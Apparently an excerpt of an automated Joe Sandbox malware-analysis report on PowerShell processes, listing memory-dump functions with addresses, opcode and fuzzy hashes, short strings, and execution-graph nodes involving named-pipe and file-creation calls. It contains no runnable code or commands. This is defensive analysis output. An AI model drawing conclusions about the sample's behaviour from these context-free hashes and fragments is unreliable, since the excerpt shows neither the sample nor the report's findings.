                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_48dd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f11f5ba154a51b38e2daab0244f35902a67a6c1c68253a0f533c2e462174c05
                                                        • Instruction ID: 6a31319939894306f52f6e5fb46d36c254cb474652e9df3cbc1b6f751ff00c04
                                                        • Opcode Fuzzy Hash: 5f11f5ba154a51b38e2daab0244f35902a67a6c1c68253a0f533c2e462174c05
                                                        • Instruction Fuzzy Hash: D501F771505344AFD7209E65EC84BA7BBCCEFC1368F18CA1AED059B282D379AC45C6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048DD005, Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340185194.00000000048DD000.00000040.00000001.sdmp, Offset: 048DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_48dd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62f028ac0d57484ffe23b3d43756004d771ebbaad82aeaa882c04b11d8cbdab0
                                                        • Instruction ID: 44f8c33f72db985f5150d9e3e4f6f33e3ee968914121fd1028975f49a31a8466
                                                        • Opcode Fuzzy Hash: 62f028ac0d57484ffe23b3d43756004d771ebbaad82aeaa882c04b11d8cbdab0
                                                        • Instruction Fuzzy Hash: BF015E6140E3C05FD7128B259C94B96BFA4EF53224F18C5DBE9848F293C2695C49C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7E1CE, Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0366cc4084810ad46b3266eec4db148e2536a64126212bf2bb70485c76630c7
                                                        • Instruction ID: 7d12bdd62d3f979ef87ad0c5ab6b1ed7d16edc104a897dd0c0028d46abb8f837
                                                        • Opcode Fuzzy Hash: f0366cc4084810ad46b3266eec4db148e2536a64126212bf2bb70485c76630c7
                                                        • Instruction Fuzzy Hash: F1F096B6205514EF9B14DB55D845CABFBF9EF89260300805AF64987711CA71AD00C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7BEF2, Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ee8ec12860aaa7739be7d0ebb6595b227f05e3b33086a00cf937748cf8d937c
                                                        • Instruction ID: c18a84f80a43f242672ff6d72a7c332b5e3bf50bb533073082b8da0a1d7eb2a0
                                                        • Opcode Fuzzy Hash: 0ee8ec12860aaa7739be7d0ebb6595b227f05e3b33086a00cf937748cf8d937c
                                                        • Instruction Fuzzy Hash: 1101A971900228DFCB44CFA9C80489EFBF0FF8D220B00816AE909E3340E730A901CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7BEF8, Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4888da3447771c562b7502f2c6b8943e9d374295d85ceb392fc405dcc6f2c695
                                                        • Instruction ID: 890889dd9b575651f3fcde493738e34e92cc91af6c8769070615765ae17a6e4f
                                                        • Opcode Fuzzy Hash: 4888da3447771c562b7502f2c6b8943e9d374295d85ceb392fc405dcc6f2c695
                                                        • Instruction Fuzzy Hash: 29F01475900228DFCB54DFA9C84489EFBF5FF8D211B1084AAE909E7310E735AA11CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7E1E6, Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 057e72265fa1659fb9de1d4697c1847f23b07ae9227ae5a28e4753a58c30f14e
                                                        • Instruction ID: cb7544545bb53308fa32202770165655c5b912dbc7223019620b0181bbab5362
                                                        • Opcode Fuzzy Hash: 057e72265fa1659fb9de1d4697c1847f23b07ae9227ae5a28e4753a58c30f14e
                                                        • Instruction Fuzzy Hash: 6BF0A076200618BF9714DB45EC44CABBBFDFB8D260300811AF60983710CB72AC01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7B5D0, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e90e1edd04c76aec9bf125c8bd8b415ba77de35660c50ef0c341fb3a6b287c6
                                                        • Instruction ID: f66d87586d2b13f4ff12e41078f8df7a0c48bb7ce0e1af6075777dab020f0d01
                                                        • Opcode Fuzzy Hash: 7e90e1edd04c76aec9bf125c8bd8b415ba77de35660c50ef0c341fb3a6b287c6
                                                        • Instruction Fuzzy Hash: CDF0A737505119BF9F05DF55AC04CEF7FAADF882707004126F51882250DA3149219BB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7E1E8, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40221a55f3ae26f0e477b7fdb06ac4382263ac6eed3b9b32c6b6092074b86aea
                                                        • Instruction ID: dbe952968183634e39bc845c35b4859b04230ef9a4d1d8456228173d3a23be10
                                                        • Opcode Fuzzy Hash: 40221a55f3ae26f0e477b7fdb06ac4382263ac6eed3b9b32c6b6092074b86aea
                                                        • Instruction Fuzzy Hash: 92F03076204618AF9714DB45E844C6BBBFDFB8D660300841AF64987710DB72AD11DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7B5E0, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1deab2bca22269b06151659de5bb1a34a0a45835073f1d3ffa310acd13b9a1fc
                                                        • Instruction ID: e94687ec20922e40982676d7e3991c328a4ccf6cf66d89334d225a2757d802a1
                                                        • Opcode Fuzzy Hash: 1deab2bca22269b06151659de5bb1a34a0a45835073f1d3ffa310acd13b9a1fc
                                                        • Instruction Fuzzy Hash: 7CE0123760011DBF8F05DE96AC04CEF7FAEEB882617048026FA18C2210DA3189219BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7B0EE, Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e35f42d08e4ad2b1ac2973d2dbefe17d1664dcb6897dfaf96c431140e794cb23
                                                        • Instruction ID: af749009b624d19c666a6e3f778a6a222759554d73c491f1c3c8a44929f585a4
                                                        • Opcode Fuzzy Hash: e35f42d08e4ad2b1ac2973d2dbefe17d1664dcb6897dfaf96c431140e794cb23
                                                        • Instruction Fuzzy Hash: 3CD02B30741011EF820076AC98448AF3B89CFC75183800468F101EBB50CE95FC0043CA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7B0EA, Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a68cbe85b618077c9dc57c4a5a719c1152e9876c0f077e16fd3472ecb280743
                                                        • Instruction ID: 193b1b5f7e9040268c2eb03cf0b969705dfdd8aad6fabe74018c44081f1e45d0
                                                        • Opcode Fuzzy Hash: 6a68cbe85b618077c9dc57c4a5a719c1152e9876c0f077e16fd3472ecb280743
                                                        • Instruction Fuzzy Hash: 73D05E31741150AB86207AFDA8458AE3799CFC65747800669E516EBBE1CEAAEC0007E7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7B0F0, Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8e5d6e5b0bbab08df1af46c209730e6993d35d623625b6791f6218e4fd9dcb3
                                                        • Instruction ID: ee58c4f76f07455c00a1d69a14ba5525781d4d4e4d4194f9f4fae7c1375ca807
                                                        • Opcode Fuzzy Hash: c8e5d6e5b0bbab08df1af46c209730e6993d35d623625b6791f6218e4fd9dcb3
                                                        • Instruction Fuzzy Hash: F4D0A731740110EBC60076FCE8444AD37D9CFC65147800069E106DFB60CEAAFC0007D7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 07E78320, Relevance: 5.5, Strings: 4, Instructions: 525COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $Xcml$Xcml$Xcml
                                                        • API String ID: 0-307529478
                                                        • Opcode ID: f7904846a1b385deda881ba5b1d970c44db36106b6aca326b783603bafe5e481
                                                        • Instruction ID: 74f5c2047dad8faa9ef59b43517789a2b435e42d9c7f436eeb1af480c5bd371f
                                                        • Opcode Fuzzy Hash: f7904846a1b385deda881ba5b1d970c44db36106b6aca326b783603bafe5e481
                                                        • Instruction Fuzzy Hash: AE127AB1B012158FDB24DBB9C858AAEB7F6AF89308F158469D506EB350EF34DC81CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E71B88, Relevance: 2.5, Instructions: 2492COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca428a1a5a74efd1e57082fa8cccdc49780a9910b40f13eb2b61a262e89686a6
                                                        • Instruction ID: b7c77c4f0c7e93415baaf0a2e33f2bd7e13579db9c9a136729b967729795b728
                                                        • Opcode Fuzzy Hash: ca428a1a5a74efd1e57082fa8cccdc49780a9910b40f13eb2b61a262e89686a6
                                                        • Instruction Fuzzy Hash: E0433C74A002298FEB65EB60CC507AE77B7EFC9308F2085A895096B759CF759D81CF42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E78310, Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xcml
                                                        • API String ID: 0-4047222193
                                                        • Opcode ID: a07fd4441d3216e923bf3c9f20ad9e4163b62565f8956a78ed18b891ceffecae
                                                        • Instruction ID: 410bec0cab8cc93bd8ad7d6f0ff4d1d2998ab5ff7af7b5bf47e7d3ab3e36798d
                                                        • Opcode Fuzzy Hash: a07fd4441d3216e923bf3c9f20ad9e4163b62565f8956a78ed18b891ceffecae
                                                        • Instruction Fuzzy Hash: 9D916EB0A012159FDB24DFA8C858AADBBF6EF89304F158569D406EB351DF34DC41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E75768, Relevance: .4, Instructions: 397COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4bfe8105e2eab7ae5a85f6c3ed130fb0205966528ed4ad7a07a2d626fc3d9a0
                                                        • Instruction ID: 4c2884a952dc99d70e28dec4c19583432ad80f239c023f4b1ba0bf4caf68992e
                                                        • Opcode Fuzzy Hash: f4bfe8105e2eab7ae5a85f6c3ed130fb0205966528ed4ad7a07a2d626fc3d9a0
                                                        • Instruction Fuzzy Hash: A4D1C3B5B012059FDB14EBB4D8509AEB7E7EFC8214B158939D906EB384DF349C02CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E79820, Relevance: .4, Instructions: 397COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 97b5f50b510225bd1d32dd0abbae2a3efe1bcefd8d7b9666de82a0cfa4482ce9
                                                        • Instruction ID: 9e8ec1affaf5ce019252a99779aacd846f0f41267d68f5ab093ca54eeb30e0c9
                                                        • Opcode Fuzzy Hash: 97b5f50b510225bd1d32dd0abbae2a3efe1bcefd8d7b9666de82a0cfa4482ce9
                                                        • Instruction Fuzzy Hash: A8E1E1B1B012069FDB14DBA4C850ABEB7F6AFC9204F159469D902AB395DB34EC41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E76728, Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d73afd4fe6e9064451673f507cb98a4a49d92d23fcb1d8219a6fd10cf08151f5
                                                        • Instruction ID: 16abd16a4ea3a9d0c35f277c71d42d1ba758b59912115f53649d365b3fd0a7f7
                                                        • Opcode Fuzzy Hash: d73afd4fe6e9064451673f507cb98a4a49d92d23fcb1d8219a6fd10cf08151f5
                                                        • Instruction Fuzzy Hash: 3EB1BE717016069FDB14DF78C884AAAB7E6EF85218F14C869E505CF241EB34ED46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E79058, Relevance: .2, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 12a161f0d9b43bcfe2c783e4b0412e3c117194f2a9e28a455af24bc2ff8aa225
                                                        • Instruction ID: c0785a23472ca0732ecc262611ddfdf931c0c654650a253735072ec6fe301793
                                                        • Opcode Fuzzy Hash: 12a161f0d9b43bcfe2c783e4b0412e3c117194f2a9e28a455af24bc2ff8aa225
                                                        • Instruction Fuzzy Hash: 078191B0B013029FDB24DBB48855ABBB3E6AFC5218F158968D5069B385DF34EC41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E74DB0, Relevance: 10.5, Strings: 8, Instructions: 482COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8^ml$dlml$dlml$dlml$dlml$dlml$dlml$dlml
                                                        • API String ID: 0-1648173814
                                                        • Opcode ID: e5395c7e6e6a729981a8e91e13f838e23c92c41b60bf677f7ef71b302008daab
                                                        • Instruction ID: 35c2bf782fe71bfe76d4e1edec8e828efab352f4cb9caba24b9d3d0e4fbb8f9b
                                                        • Opcode Fuzzy Hash: e5395c7e6e6a729981a8e91e13f838e23c92c41b60bf677f7ef71b302008daab
                                                        • Instruction Fuzzy Hash: 2A128170A12609DFCB14DFA4D444AADB7F2FF85319F109928E4069B3A0EB75EC85CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: powershell.exe PID: 7140 Parent PID: 7084 powershell.exeCOMMON

                                                        Execution Graph

                                                        Execution Coverage:5.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:13.6%
                                                        Total number of Nodes:22
                                                        Total number of Limit Nodes:1

                                                        Graph

                                                        execution_graph 40310 80d5248 40311 80d5261 40310->40311 40313 80d52ca 40311->40313 40316 80d5570 40311->40316 40321 80d5580 40311->40321 40312 80d52bd 40318 80d557b 40316->40318 40317 80d56b0 40317->40312 40318->40317 40326 80d5860 40318->40326 40330 80d5856 40318->40330 40322 80d55a6 40321->40322 40323 80d56b0 40321->40323 40322->40323 40324 80d5856 CreateNamedPipeW 40322->40324 40325 80d5860 CreateNamedPipeW 40322->40325 40323->40312 40324->40323 40325->40323 40327 80d58be CreateNamedPipeW 40326->40327 40329 80d5992 40327->40329 40331 80d585b CreateNamedPipeW 40330->40331 40333 80d5992 40331->40333 40334 7a6f788 40337 7a6ef58 40334->40337 40338 7a6f910 CreateFileW 40337->40338 40340 7a6f7a7 40338->40340

                                                        Executed Functions

                                                        Function 07A341F0, Relevance: 4.4, Strings: 1, Instructions: 3139COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: db9d27f22da4205674b1c9f916110008fb436788e96adf074e526d77e6ff987f
                                                        • Instruction ID: d322bf5c148156ee060e1332ac552d15ce7c741de471a915c48ec3a0d2c4a41e
                                                        • Opcode Fuzzy Hash: db9d27f22da4205674b1c9f916110008fb436788e96adf074e526d77e6ff987f
                                                        • Instruction Fuzzy Hash: CE63E5B4A00219DFDB64DF24D855BA9BBB2FF89305F1080A9E40AA7750DF399E81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 080D5860, Relevance: 1.6, APIs: 1, Instructions: 125pipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1155 80d5860-80d58ca 1157 80d58cc-80d58d2 1155->1157 1158 80d58d5-80d58de 1155->1158 1157->1158 1159 80d58fd-80d5901 1158->1159 1160 80d58e0-80d58fc 1158->1160 1161 80d5903-80d591a 1159->1161 1162 80d5922-80d5990 CreateNamedPipeW 1159->1162 1160->1159 1161->1162 1164 80d5999-80d59d7 1162->1164 1165 80d5992-80d5998 1162->1165 1169 80d59ec-80d59f0 1164->1169 1170 80d59d9-80d59dd 1164->1170 1165->1164 1172 80d5a01 1169->1172 1173 80d59f2-80d59fe 1169->1173 1170->1169 1171 80d59df-80d59e2 1170->1171 1171->1169 1174 80d5a02 1172->1174 1173->1172 1174->1174
                                                        APIs
                                                        • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 080D5980
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431476098.00000000080D0000.00000040.00000001.sdmp, Offset: 080D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_80d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateNamedPipe
                                                        • String ID:
                                                        • API String ID: 2489174969-0
                                                        • Opcode ID: 1f84e1367ec722062a954f4ea425d8a910c35a20cb45abc728f521dd5876960f
                                                        • Instruction ID: 2ec41e9f6892dfa6189ef3665c6e24519eafa10a603d59ebde76eaba6a1f13a6
                                                        • Opcode Fuzzy Hash: 1f84e1367ec722062a954f4ea425d8a910c35a20cb45abc728f521dd5876960f
                                                        • Instruction Fuzzy Hash: 9051F3B0D013489FDB14CFA9D884B8EFBF6AF48314F24852AE818AB260D7759944CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3A16F, Relevance: 1.0, Instructions: 1009COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1efecb34f757ce6ebf275ea3f22a51f9653e4a276719e5a1188985c38a6e785b
                                                        • Instruction ID: b40426bad57ccc1a44ba448b3a2adf24059e6a37d21a7239edbe72f0044f20e6
                                                        • Opcode Fuzzy Hash: 1efecb34f757ce6ebf275ea3f22a51f9653e4a276719e5a1188985c38a6e785b
                                                        • Instruction Fuzzy Hash: BAB207B4A01329CFDB64DF24D848B99B7B2BF89305F1084E9E40AA7790DB359E85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3DFA8, Relevance: .6, Instructions: 649COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7032901d414ae1a7899c38fb4e2a3fa71f82e0c6d16b36c8fa5274e83fad140b
                                                        • Instruction ID: 37f991689eae65e825b51ad327970e81eb046fca54d14ea3afbaf2353f44a684
                                                        • Opcode Fuzzy Hash: 7032901d414ae1a7899c38fb4e2a3fa71f82e0c6d16b36c8fa5274e83fad140b
                                                        • Instruction Fuzzy Hash: FF527B70A00219DFDF14DF64C844BEEB7F6AF89304F1485A9E909AB260DB74ED81CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A30040, Relevance: .6, Instructions: 579COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba3f999dbcf97adf73db92b6d0193cf741ae76a07a41a4062cf8f897d9a74ed4
                                                        • Instruction ID: 2229f05e046538dbcb15f66ff045c3afab6fc76992e0fa591085810c11c727d0
                                                        • Opcode Fuzzy Hash: ba3f999dbcf97adf73db92b6d0193cf741ae76a07a41a4062cf8f897d9a74ed4
                                                        • Instruction Fuzzy Hash: 3A422974A01219CFDB24DF74C854BAEB7B2BF85305F1086A9E809AB390DB75AD81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3F278, Relevance: .5, Instructions: 532COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2a979a9d0170c07c20dd3db58144a2d468fd98f70996739885ae56449c3518f
                                                        • Instruction ID: fc4b5fb6b3f47d90ee822d8f2a62bfce2d952abdec60b667993739c6b6cceef8
                                                        • Opcode Fuzzy Hash: e2a979a9d0170c07c20dd3db58144a2d468fd98f70996739885ae56449c3518f
                                                        • Instruction Fuzzy Hash: 51229EB0E10206CFDB18DF79C984AAEB7B2BF84304F108569E8259B395EB35ED45CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 080D5856, Relevance: 1.6, APIs: 1, Instructions: 132pipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1132 80d5856-80d5859 1133 80d5889-80d58ca 1132->1133 1134 80d585b-80d5884 1132->1134 1136 80d58cc-80d58d2 1133->1136 1137 80d58d5-80d58de 1133->1137 1134->1133 1136->1137 1138 80d58fd-80d5901 1137->1138 1139 80d58e0-80d58fc 1137->1139 1140 80d5903-80d591a 1138->1140 1141 80d5922-80d5990 CreateNamedPipeW 1138->1141 1139->1138 1140->1141 1143 80d5999-80d59d7 1141->1143 1144 80d5992-80d5998 1141->1144 1148 80d59ec-80d59f0 1143->1148 1149 80d59d9-80d59dd 1143->1149 1144->1143 1151 80d5a01 1148->1151 1152 80d59f2-80d59fe 1148->1152 1149->1148 1150 80d59df-80d59e2 1149->1150 1150->1148 1153 80d5a02 1151->1153 1152->1151 1153->1153
                                                        APIs
                                                        • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 080D5980
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431476098.00000000080D0000.00000040.00000001.sdmp, Offset: 080D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_80d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateNamedPipe
                                                        • String ID:
                                                        • API String ID: 2489174969-0
                                                        • Opcode ID: 5e90dfca2e52413ce61e3264ee63dc56f2dc94cb8b0933b0e9e28f5976b3b5ee
                                                        • Instruction ID: fda16f0f6af08ca2adfb7b2b5f8c48b25b07b0406a0782b84f82dbf4576af9a2
                                                        • Opcode Fuzzy Hash: 5e90dfca2e52413ce61e3264ee63dc56f2dc94cb8b0933b0e9e28f5976b3b5ee
                                                        • Instruction Fuzzy Hash: 8E5103B0D013489FDB14CFA9D884BDEFBF2AF88314F24852AE818AB260D7759841CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A6EF58, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
